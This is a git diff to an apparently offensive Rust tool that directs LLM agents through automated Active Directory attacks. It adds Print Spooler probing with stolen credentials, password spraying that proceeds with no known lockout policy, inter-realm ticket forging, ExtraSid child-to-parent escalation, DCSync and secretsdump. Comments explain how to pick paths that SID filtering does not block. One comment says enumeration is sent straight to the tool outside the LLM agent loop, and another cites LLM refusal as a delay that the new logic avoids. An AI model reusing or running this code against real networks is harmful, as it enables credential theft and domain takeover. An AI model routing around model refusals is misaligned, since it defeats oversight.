+ continue;
+ }
+
+ let domain = host
+ .hostname
+ .find('.')
+ .map(|i| host.hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain)
+ .or_else(|| state.credentials.first())
+ .cloned();
+
+ let cred = match cred {
+ Some(c) => c,
+ None => continue,
+ };
+
+ items.push(SpoolerWork {
+ dedup_key,
+ target_ip: host.ip.clone(),
+ hostname: host.hostname.clone(),
+ domain,
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Checks discovered hosts for Print Spooler service availability.
+/// Interval: 45s.
+pub async fn auto_spooler_check(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("spooler_check") {
+ continue;
+ }
+
+ let work: Vec<SpoolerWork> = {
+ let state = dispatcher.state.read().await;
+ collect_spooler_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "spooler_check",
+ "target_ip": item.target_ip,
+ "hostname": item.hostname,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("spooler_check");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ target = %item.target_ip,
+ hostname = %item.hostname,
+ "Print Spooler check dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_SPOOLER_CHECK, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_SPOOLER_CHECK, &item.dedup_key)
+ .await;
+
+ // Register spooler_enabled vulnerability proactively so it
+ // appears in reports. The agent's report_finding callback
+ // only logs — this ensures the finding is durable.
+ let vuln = ares_core::models::VulnerabilityInfo {
+ vuln_id: format!("spooler_{}", item.target_ip.replace('.', "_")),
+ vuln_type: "spooler_enabled".to_string(),
+ target: item.target_ip.clone(),
+ discovered_by: "auto_spooler_check".to_string(),
+ discovered_at: chrono::Utc::now(),
+ details: {
+ let mut d = std::collections::HashMap::new();
+ d.insert("target_ip".to_string(), json!(item.target_ip));
+ d.insert("hostname".to_string(), json!(item.hostname));
+ d.insert("domain".to_string(), json!(item.domain));
+ d.insert(
+ "description".to_string(),
+ json!("Print Spooler service (MS-RPRN) is running. Enables PrinterBug coercion and is a prerequisite for PrintNightmare (CVE-2021-1675)."),
+ );
+ d
+ },
+ recommended_agent: "privesc".to_string(),
+ priority: dispatcher.effective_priority("spooler_check"),
+ };
+
+ match dispatcher
+ .state
+ .publish_vulnerability_with_strategy(
+ &dispatcher.queue,
+ vuln,
+ Some(&dispatcher.config.strategy),
+ )
+ .await
+ {
+ Ok(true) => {
+ info!(
+ target = %item.target_ip,
+ hostname = %item.hostname,
+ "Print Spooler enabled — vulnerability registered"
+ );
+ }
+ Ok(false) => {}
+ Err(e) => {
+ warn!(err = %e, target = %item.target_ip, "Failed to publish spooler vulnerability");
+ }
+ }
+ }
+ Ok(None) => {
+ debug!(target = %item.target_ip, "Spooler check deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, target = %item.target_ip, "Failed to dispatch spooler check");
+ }
+ }
+ }
+ }
+}
+
+struct SpoolerWork {
+ dedup_key: String,
+ target_ip: String,
+ hostname: String,
+ domain: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::StateInner;
+
+ fn make_credential(
+ username: &str,
+ password: &str,
+ domain: &str,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_host(ip: &str, hostname: &str) -> ares_core::models::Host {
+ ares_core::models::Host {
+ ip: ip.to_string(),
+ hostname: hostname.to_string(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc: false,
+ owned: false,
+ }
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("spooler:{}", "192.168.58.22");
+ assert_eq!(key, "spooler:192.168.58.22");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_SPOOLER_CHECK, "spooler_check");
+ }
+
+ #[test]
+ fn domain_from_hostname() {
+ let hostname = "srv01.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_spooler_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ let work = collect_spooler_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_host_with_credential_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_spooler_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.22");
+ assert_eq!(work[0].hostname, "srv01.contoso.local");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dedup_key, "spooler:192.168.58.22");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_multiple_hosts_produces_work_for_each() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state
+ .hosts
+ .push(make_host("192.168.58.23", "srv02.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_spooler_work(&state);
+ assert_eq!(work.len(), 2);
+ let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect();
+ assert!(ips.contains(&"192.168.58.22"));
+ assert!(ips.contains(&"192.168.58.23"));
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed_host() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_SPOOLER_CHECK, "spooler:192.168.58.22".into());
+ let work = collect_spooler_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed_keeps_unprocessed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state
+ .hosts
+ .push(make_host("192.168.58.23", "srv02.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_SPOOLER_CHECK, "spooler:192.168.58.22".into());
+ let work = collect_spooler_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.23");
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_spooler_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ // Only fabrikam credential available for contoso host
+ state
+ .credentials
+ .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_spooler_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fabuser");
+ }
+
+ #[test]
+ fn collect_host_without_fqdn_gets_empty_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state.hosts.push(make_host("192.168.58.22", "srv01"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_spooler_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "");
+ // Falls back to first credential since domain is empty
+ assert_eq!(work[0].credential.username, "admin");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/stall_detection.rs b/ares-cli/src/orchestrator/automation/stall_detection.rs
index 9b160bcf..181470ce 100644
--- a/ares-cli/src/orchestrator/automation/stall_detection.rs
+++ b/ares-cli/src/orchestrator/automation/stall_detection.rs
@@ -161,6 +161,7 @@ pub async fn auto_stall_detection(
"target_ip": dc_ip,
"domain": domain,
"use_common_passwords": true,
+ "acknowledge_no_policy": true,
});
match dispatcher
diff --git a/ares-cli/src/orchestrator/automation/trust.rs b/ares-cli/src/orchestrator/automation/trust.rs
index 598871ca..f46a018e 100644
--- a/ares-cli/src/orchestrator/automation/trust.rs
+++ b/ares-cli/src/orchestrator/automation/trust.rs
@@ -9,6 +9,7 @@
//! 3. **Trust follow**: When a trust account hash is found, dispatch inter-realm
//! ticket creation and secretsdump against the foreign DC.
+use std::collections::HashSet;
use std::sync::Arc;
use std::time::Duration;
@@ -16,6 +17,8 @@ use serde_json::json;
use tokio::sync::watch;
use tracing::{debug, info, warn};
+use ares_llm::ToolCall;
+
use crate::orchestrator::dispatcher::Dispatcher;
use crate::orchestrator::state::*;
@@ -42,6 +45,150 @@ fn trust_account_name(flat_name: &str) -> String {
format!("{}$", flat_name.to_uppercase())
}
+/// Returns true when source and target are in different forests
+/// (neither is a parent or child of the other, and they are not equal).
+///
+/// Inter-forest trusts are subject to SID filtering on the target DC, which
+/// strips ExtraSid claims with RID < 1000 (Enterprise Admins, Domain Admins,
+/// Administrator). The inter-realm TGT authenticates but the privileged claim
+/// is silently dropped — DCSync against the target DC then fails with
+/// `rpc_s_access_denied`. This helper distinguishes the doomed path from
+/// child→parent escalation (intra-forest), which is exploitable.
+fn is_inter_forest(source: &str, target: &str) -> bool {
+ let s = source.to_lowercase();
+ let t = target.to_lowercase();
+ if s.is_empty() || t.is_empty() || s == t {
+ return false;
+ }
+ if s.ends_with(&format!(".{t}")) || t.ends_with(&format!(".{s}")) {
+ return false;
+ }
+ true
+}
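+// Illustrative classifications (hypothetical domain names), tracing the
+// suffix checks above:
+//   is_inter_forest("contoso.local", "fabrikam.local")      == true   (separate forests)
+//   is_inter_forest("child.contoso.local", "contoso.local") == false  (child→parent)
+//   is_inter_forest("contoso.local", "contoso.local")       == false  (same domain)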
+
+/// Returns true if the trust source→target is inter-forest with SID filtering
+/// active — meaning `forge_inter_realm_and_dump` will be rejected at DCSync
+/// regardless of trust key validity. Caller should suppress the doomed
+/// dispatch and accelerate cross-forest fallback paths instead.
+///
+/// Decision tree:
+/// - Intra-forest (child↔parent or same domain): false (raise_child handles it)
+/// - Explicit `TrustInfo` with `is_cross_forest()` and `sid_filtering=true`: true
+/// - Explicit `TrustInfo` with `is_cross_forest()` and `sid_filtering=false`:
+/// false (someone disabled SID filtering — try the forge)
+/// - No `TrustInfo` but the names are inter-forest: false (try the forge —
+/// missing metadata means we can't be sure SID filtering is on, and the
+/// ~30s cost of an unnecessary attempt is cheaper than silently dropping
+/// a valid attack path on a misconfigured trust)
+fn is_filtered_inter_forest_trust(state: &StateInner, source: &str, target: &str) -> bool {
+ if !is_inter_forest(source, target) {
+ return false;
+ }
+ let target_l = target.to_lowercase();
+ // Look up only the target's metadata. `trusted_domains` is keyed by the
+ // foreign-side domain name in each enumeration result, so the entry for
+ // `target_l` describes the source→target relationship. Falling back to
+ // the source key returns *some other* trust the source happens to have
+ // (e.g. child→contoso parent_child stored under "contoso.local"
+ // when we query contoso→fabrikam), which would wrongly classify the
+ // unknown cross-forest path as intra-forest and let the doomed forge fire.
+ if let Some(t) = state.trusted_domains.get(&target_l) {
+ if t.is_cross_forest() {
+ return t.sid_filtering;
+ }
+ // Trust enumeration disagrees with name-based heuristic — trust the
+ // explicit metadata (e.g. unusual same-forest cross-DNS-suffix setup).
+ return false;
+ }
+ // No metadata — try the forge. False positives (SID filtering actually on)
+ // cost ~30s for a doomed DCSync attempt; false negatives (refusing a valid
+ // attack on a misconfigured trust where SID filtering is off) cost the
+ // entire foreign domain. Prefer the cheaper failure mode.
+ false
+}
+
+/// Clear cross-forest fallback dedup keys for `target_domain` so the next
+/// tick of `auto_cross_forest_enum`, `auto_foreign_group_enum`, and
+/// `auto_acl_discovery` re-fires against the foreign forest with current
+/// credentials. Called when a doomed forest_trust_escalation is suppressed
+/// — the trust hash extraction usually populates new state (DC IPs, SIDs)
+/// that should kick the fallbacks back into action.
+async fn wake_cross_forest_fallbacks(dispatcher: &Dispatcher, target_domain: &str) {
+ let target_l = target_domain.to_lowercase();
+ // (set_name, prefix) pairs — must stay in sync with the auto_*_enum
+ // dedup-key formats in their respective modules.
+ let mut prefixes: Vec<(&str, String)> = vec![
+ (DEDUP_CROSS_FOREST_ENUM, format!("xforest:{target_l}:")),
+ (
+ DEDUP_FOREIGN_GROUP_ENUM,
+ format!("foreign_group:{target_l}"),
+ ),
+ (DEDUP_ACL_DISCOVERY, format!("acl_disc:{target_l}:")),
+ ];
+
+ // ADCS dedup keys are `{host}:cred:{user@dom}` / `{host}:hash:{user@dom}`,
+ // keyed on the CA host (IP or hostname) — not the target domain. So for
+ // each known host that belongs to `target_domain`, add a `{host}:` prefix.
+ // This lets a freshly-acquired cross-forest credential re-attempt
+ // certipy_find against a fabrikam CA that was previously locked by a wrong
+ // initial cred.
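+ // e.g. clearing the prefix "192.168.58.30:" (hypothetical CA host) drops
+ // both "192.168.58.30:cred:admin@fabrikam.local" and
+ // "192.168.58.30:hash:admin@fabrikam.local".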
+ {
+ let s = dispatcher.state.read().await;
+ let suffix = format!(".{target_l}");
+ for h in s.hosts.iter() {
+ let hostname = h.hostname.to_lowercase();
+ let belongs =
+ !hostname.is_empty() && (hostname == target_l || hostname.ends_with(&suffix));
+ if !belongs {
+ continue;
+ }
+ if !h.ip.is_empty() {
+ prefixes.push((DEDUP_ADCS_SERVERS, format!("{}:", h.ip)));
+ }
+ prefixes.push((DEDUP_ADCS_SERVERS, format!("{hostname}:")));
+ }
+ }
+
+ let cleared: Vec<(&str, Vec<String>)> = {
+ let mut s = dispatcher.state.write().await;
+ prefixes
+ .iter()
+ .map(|(set, prefix)| (*set, s.unmark_processed_by_prefix(set, prefix)))
+ .filter(|(_, v)| !v.is_empty())
+ .collect()
+ };
+ let cleared_count: usize = cleared.iter().map(|(_, v)| v.len()).sum();
+ if cleared_count == 0 {
+ // Nothing to clear means ACL/cross-forest enum never ran against this
+ // target — usually because no same-realm credential exists. Fallback
+ // wake is a no-op here; the orchestrator will keep flailing on
+ // NTLM-bound paths that fail with LDAP 0x52e against the foreign forest. Logging
+ // this signal makes the architectural gap visible in the trace.
+ info!(
+ target = %target_domain,
+ "wake_cross_forest_fallbacks: no dedup keys to clear — \
+ ACL/foreign-group/cross-forest enum never registered for this \
+ target (likely no same-realm credential). Forge-only fallback \
+ via create_inter_realm_ticket would be needed to bind LDAP \
+ via Kerberos."
+ );
+ } else {
+ info!(
+ target = %target_domain,
+ cleared_count,
+ "wake_cross_forest_fallbacks: cleared dedup keys to retrigger fallback enums"
+ );
+ }
+ for (set, keys) in cleared {
+ for key in keys {
+ let _ = dispatcher
+ .state
+ .unpersist_dedup(&dispatcher.queue, set, &key)
+ .await;
+ }
+ }
+}
+
/// Check if a credential domain matches a target domain (exact, child, or parent).
fn is_domain_related(cred_domain: &str, target_domain: &str) -> bool {
let cd = cred_domain.to_lowercase();
@@ -81,25 +228,38 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch:
// Two dedup keys per domain:
// trust_enum:<domain> — password-based attempt
// trust_enum_hash:<domain> — hash-based retry (for dominated domains)
- let enum_work: Vec<(String, String, String)> = state
+ //
+ // Iterate the union of `domain_controllers` keys and
+ // `dominated_domains`. The latter covers the case where a
+ // domain was compromised (e.g. via raise_child to the parent)
+ // but its DC was never explicitly seeded into
+ // `domain_controllers` — without this, parent-DC trust
+ // enumeration would never fire and cross-forest trusts would
+ // remain undiscovered.
+ let mut candidate_domains: HashSet<String> = state
.domain_controllers
+ .keys()
+ .map(|d| d.to_lowercase())
+ .collect();
+ for d in state.dominated_domains.iter() {
+ candidate_domains.insert(d.to_lowercase());
+ }
+ let enum_work: Vec<(String, String, String)> = candidate_domains
.iter()
- .filter(|(domain, _)| {
- let key = trust_enum_dedup_key(domain, false);
- let hash_key = trust_enum_dedup_key(domain, true);
- !state.is_processed(DEDUP_TRUST_FOLLOW, &key)
- || (!state.is_processed(DEDUP_TRUST_FOLLOW, &hash_key)
- && state.dominated_domains.contains(&domain.to_lowercase()))
- })
- .map(|(domain, dc_ip)| {
- // Use hash_key if password-based was already tried
+ .filter_map(|domain| {
+ let dc_ip = state.resolve_dc_ip(domain)?;
let pw_key = trust_enum_dedup_key(domain, false);
- let key = if state.is_processed(DEDUP_TRUST_FOLLOW, &pw_key) {
- trust_enum_dedup_key(domain, true)
- } else {
- pw_key
- };
- (key, domain.clone(), dc_ip.clone())
+ let hash_key = trust_enum_dedup_key(domain, true);
+ let pw_done = state.is_processed(DEDUP_TRUST_FOLLOW, &pw_key);
+ let hash_done = state.is_processed(DEDUP_TRUST_FOLLOW, &hash_key);
+ let dominated = state.dominated_domains.contains(domain);
+ // Skip if password attempt is done AND (no hash retry
+ // applies, or hash retry already done).
+ if pw_done && (!dominated || hash_done) {
+ return None;
+ }
+ let key = if pw_done { hash_key } else { pw_key };
+ Some((key, domain.clone(), dc_ip))
})
.collect();
drop(state);
@@ -164,39 +324,152 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch:
};
if let Some(cred_json) = cred_payload {
- let payload = json!({
- "techniques": ["enumerate_domain_trusts"],
- "target_ip": dc_ip,
+ // Direct tool dispatch — bypass the LLM agent loop.
+ // The recon prompt template did not surface
+ // `credential.hash` (only password), so LLM-driven trust
+ // enumeration with hash auth would render an empty
+ // password and fail with LDAP 52e. The orchestrator
+ // already owns every input here; deliver them directly
+ // to enumerate_domain_trusts via dispatch_tool.
+ let mut args = json!({
+ "target": dc_ip,
"domain": domain,
- "credential": cred_json,
+ "username": cred_json
+ .get("username")
+ .and_then(|v| v.as_str())
+ .unwrap_or(""),
});
+ if let Some(p) = cred_json
+ .get("password")
+ .and_then(|v| v.as_str())
+ .filter(|s| !s.is_empty())
+ {
+ args["password"] = json!(p);
+ }
+ if let Some(h) = cred_json
+ .get("hash")
+ .and_then(|v| v.as_str())
+ .filter(|s| !s.is_empty())
+ {
+ args["hash"] = json!(h);
+ }
+ if let Some(bd) = cred_json
+ .get("domain")
+ .and_then(|v| v.as_str())
+ .filter(|s| !s.is_empty() && !s.eq_ignore_ascii_case(&domain))
+ {
+ args["bind_domain"] = json!(bd);
+ }
+
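+ // Resulting args (illustrative values): {"target":"192.168.58.10",
+ // "domain":"fabrikam.local","username":"admin","hash":"<NT hash>",
+ // "bind_domain":"contoso.local"}; password, hash, and bind_domain
+ // appear only when present and non-empty.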
+ let call = ToolCall {
+ id: format!("trust_enum_{}", uuid::Uuid::new_v4().simple()),
+ name: "enumerate_domain_trusts".to_string(),
+ arguments: args,
+ };
+ let task_id = format!(
+ "trust_enum_{}",
+ &uuid::Uuid::new_v4().simple().to_string()[..12]
+ );
- match dispatcher
- .throttled_submit("recon", "recon", payload, 3)
+ // Mark dedup BEFORE spawn so the next 30s tick doesn't
+ // re-dispatch while enumeration is in flight.
+ dispatcher
+ .state
+ .write()
.await
- {
- Ok(Some(task_id)) => {
- info!(
- task_id = %task_id,
- domain = %domain,
- auth = auth_method,
- "Trust enumeration dispatched"
- );
- dispatcher
+ .mark_processed(DEDUP_TRUST_FOLLOW, key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key)
+ .await;
+
+ info!(
+ task_id = %task_id,
+ domain = %domain,
+ dc_ip = %dc_ip,
+ auth = auth_method,
+ "Dispatching enumerate_domain_trusts (direct tool, no LLM)"
+ );
+
+ let dispatcher_bg = dispatcher.clone();
+ let domain_bg = domain.clone();
+ let key_bg = key.clone();
+ let auth_method_bg = auth_method.to_string();
+ tokio::spawn(async move {
+ let result = dispatcher_bg
+ .llm_runner
+ .tool_dispatcher()
+ .dispatch_tool("recon", &task_id, &call)
+ .await;
+ // Failure handling depends on which auth attempt
+ // just failed:
+ //
+ // - password attempt: leave the dedup mark in place
+ // so the next 30s tick sees `pw_done=true` and
+ // escalates to the hash-key path (gated on the
+ // domain being in `dominated_domains`). Clearing
+ // the mark would loop forever on the same wrong
+ // sibling-domain credential.
+ // - hash attempt: clear so a future tick can retry
+ // if a fresh hash becomes available.
+ let clear_dedup = || async {
+ dispatcher_bg
.state
.write()
.await
- .mark_processed(DEDUP_TRUST_FOLLOW, key.clone());
- let _ = dispatcher
+ .unmark_processed(DEDUP_TRUST_FOLLOW, &key_bg);
+ let _ = dispatcher_bg
.state
- .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key)
+ .unpersist_dedup(
+ &dispatcher_bg.queue,
+ DEDUP_TRUST_FOLLOW,
+ &key_bg,
+ )
.await;
+ };
+ let on_failure = || async {
+ if auth_method_bg == "password" {
+ // Mark stays — escalation to hash retry on next tick.
+ } else {
+ clear_dedup().await;
+ }
+ };
+ match result {
+ Ok(exec_result) => {
+ if let Some(err) = exec_result.error.as_ref() {
+ warn!(
+ err = %err,
+ domain = %domain_bg,
+ auth = %auth_method_bg,
+ "enumerate_domain_trusts returned error"
+ );
+ on_failure().await;
+ return;
+ }
+ let trust_count = exec_result
+ .discoveries
+ .as_ref()
+ .and_then(|d| d.get("trusted_domains"))
+ .and_then(|t| t.as_array())
+ .map(|a| a.len())
+ .unwrap_or(0);
+ info!(
+ domain = %domain_bg,
+ trust_count = trust_count,
+ "enumerate_domain_trusts completed"
+ );
+ }
+ Err(e) => {
+ warn!(
+ err = %e,
+ domain = %domain_bg,
+ auth = %auth_method_bg,
+ "enumerate_domain_trusts dispatch errored"
+ );
+ on_failure().await;
+ }
}
- Ok(None) => {
- debug!(domain = %domain, "Trust enum throttled — deferred");
- }
- Err(e) => warn!(err = %e, "Failed to dispatch trust enumeration"),
- }
+ });
}
}
}
@@ -204,47 +477,111 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch:
// Child-to-parent escalation (ExtraSid via raiseChild)
//
- // When a parent_child trust is discovered and the child domain is dominated,
- // dispatch a child_to_parent exploit task. The LLM prompt offers raiseChild
- // (automated) and manual ExtraSid golden ticket as alternatives.
+ // Dispatches when a child domain is dominated and its parent FQDN is
+ // known. We derive the parent FQDN by stripping the leftmost label of
+ // the dominated child (always valid intra-forest — child FQDN is
+ // `{label}.{parent_fqdn}` by AD construction), then ALSO union with
+ // any explicit parent_child trusts discovered via LDAP enumeration.
+ //
+ // The intra-forest derivation lets us fire immediately on child DA,
+ // bypassing the trust enumeration round-trip — without it we'd block
+ // until `trusted_domains` was populated, which sometimes never
+ // happens (LLM refusal, network, throttle starvation).
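+ // e.g. a dominated child "dev.contoso.local" (3 labels) derives parent
+ // "contoso.local"; a bare "contoso.local" (2 labels) is skipped, since
+ // stripping its leftmost label would leave a TLD, not a parent domain.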
{
let state = dispatcher.state.read().await;
- if state.has_domain_admin && !state.trusted_domains.is_empty() {
- let child_work: Vec<(String, String, String, String)> = state
- .trusted_domains
- .values()
- .filter(|trust| trust.is_parent_child())
- .filter_map(|trust| {
- let parent_domain = &trust.domain;
+ // Build the candidate child set as the union of dominated domains
+ // (krbtgt observed) and domains where we have a non-empty
+ // Administrator NTLM hash. The latter covers the common case where
+ // GOAD-style password reuse gives us a working DA hash via local
+ // SAM dumps before we ever DCSync krbtgt — without it the trust
+ // automation deadlocks waiting for krbtgt.
+ let mut candidate_children: HashSet<String> = state
+ .dominated_domains
+ .iter()
+ .map(|d| d.to_lowercase())
+ .collect();
+ for h in state.hashes.iter() {
+ if h.username.eq_ignore_ascii_case("administrator")
+ && h.hash_type.eq_ignore_ascii_case("NTLM")
+ && !h.hash_value.is_empty()
+ && !h.domain.is_empty()
+ {
+ candidate_children.insert(h.domain.to_lowercase());
+ }
+ }
+ if !candidate_children.is_empty() {
+ let mut child_work: Vec<(String, String, String, String)> = Vec::new();
+
+ // Path A: derived intra-forest. For each candidate child (FQDN
+ // with 3+ labels), the parent is `labels[1..].join(".")`.
+ for child_domain in candidate_children.iter() {
+ let cd_lower = child_domain.to_lowercase();
+ let labels: Vec<&str> = cd_lower.split('.').collect();
+ if labels.len() < 3 {
+ continue;
+ }
+ let parent_domain = labels[1..].join(".");
+ if parent_domain.is_empty() || !parent_domain.contains('.') {
+ continue;
+ }
+ if state.dominated_domains.contains(&parent_domain) {
+ continue;
+ }
+ // Require parent DC IP resolvable (via domain_controllers
+ // or hosts table) so secretsdump has a target IP.
+ let parent_dc_ip = match state.resolve_dc_ip(&parent_domain) {
+ Some(ip) => ip,
+ None => continue,
+ };
+ let key = format!("raise_child:{}", cd_lower);
+ if state.is_processed(DEDUP_TRUST_FOLLOW, &key) {
+ continue;
+ }
+ let child_dc_ip = match state.domain_controllers.get(&cd_lower) {
+ Some(ip) => ip.clone(),
+ None => continue,
+ };
+ let _ = parent_dc_ip; // resolved later under fresh read lock
+ child_work.push((key, child_domain.clone(), parent_domain, child_dc_ip));
+ }
- // Skip if parent is already dominated
+ // Path B: explicit parent_child trusts from LDAP enumeration.
+ // Skip duplicates of Path A (same dedup key).
+ if !state.trusted_domains.is_empty() {
+ for trust in state.trusted_domains.values() {
+ if !trust.is_parent_child() {
+ continue;
+ }
+ let parent_domain = trust.domain.clone();
if state
.dominated_domains
.contains(&parent_domain.to_lowercase())
{
- return None;
+ continue;
}
-
- // Find a dominated child domain for this parent
- // (child FQDN ends with .{parent})
- let child_domain = state.dominated_domains.iter().find(|d| {
+ let child_domain = match candidate_children.iter().find(|d| {
d.to_lowercase()
.ends_with(&format!(".{}", parent_domain.to_lowercase()))
- })?;
-
+ }) {
+ Some(d) => d.clone(),
+ None => continue,
+ };
let key = format!("raise_child:{}", child_domain.to_lowercase());
if state.is_processed(DEDUP_TRUST_FOLLOW, &key) {
- return None;
+ continue;
}
+ if child_work.iter().any(|(k, _, _, _)| k == &key) {
+ continue;
+ }
+ let child_dc_ip =
+ match state.domain_controllers.get(&child_domain.to_lowercase()) {
+ Some(ip) => ip.clone(),
+ None => continue,
+ };
+ child_work.push((key, child_domain, parent_domain, child_dc_ip));
+ }
+ }
- let dc_ip = state
- .domain_controllers
- .get(&child_domain.to_lowercase())
- .cloned()?;
-
- Some((key, child_domain.clone(), parent_domain.clone(), dc_ip))
- })
- .collect();
drop(state);
for (key, child_domain, parent_domain, dc_ip) in child_work {
@@ -347,13 +684,24 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch:
// Dispatch child-to-parent exploit task. The LLM prompt
// offers raiseChild (automated) and manual ExtraSid golden
// ticket creation as alternatives.
+ // `dc_ip` is the child DC (for trust key extraction).
+ // `target` should be the parent DC (for secretsdump after forging ticket).
+ // Use resolve_dc_ip so the hosts table fills in when
+ // domain_controllers lacks the parent — falls back to the
+ // child DC only as a last resort (DCSync can succeed
+ // against any writable DC in the parent domain).
+ let parent_dc_ip = {
+ let s = dispatcher.state.read().await;
+ s.resolve_dc_ip(&parent_domain)
+ .unwrap_or_else(|| dc_ip.clone())
+ };
let mut payload = json!({
"technique": "create_inter_realm_ticket",
"vuln_type": "child_to_parent",
"domain": child_domain,
"trusted_domain": parent_domain,
"target_domain": parent_domain,
- "target": &dc_ip,
+ "target": &parent_dc_ip,
"dc_ip": dc_ip,
"vuln_id": &vuln_id,
});
@@ -363,50 +711,372 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch:
payload[k] = v.clone();
}
}
- // Add domain SIDs if already resolved
- {
+ // Add domain SIDs and child krbtgt (for ExtraSid via child
+ // krbtgt — preferred path, no inter-realm trust key needed).
+ //
+ // The ExtraSid attack requires the PARENT forest SID (RID 519
+ // = Enterprise Admins). If we ship the child SID by mistake,
+ // the parent KDC rejects the ticket with KDC_ERR_PREAUTH_FAILED
+ // because the embedded SID doesn't resolve to a real EA group.
+ // So if the parent SID isn't cached, resolve it via lookupsid
+ // against the parent DC using child admin creds (cross-trust
+ // SAMR works) BEFORE dispatching the exploit task. Defer the
+ // dispatch (no dedup mark) when resolution fails so the next
+ // 30s tick can retry once host scans / DC enumeration progress.
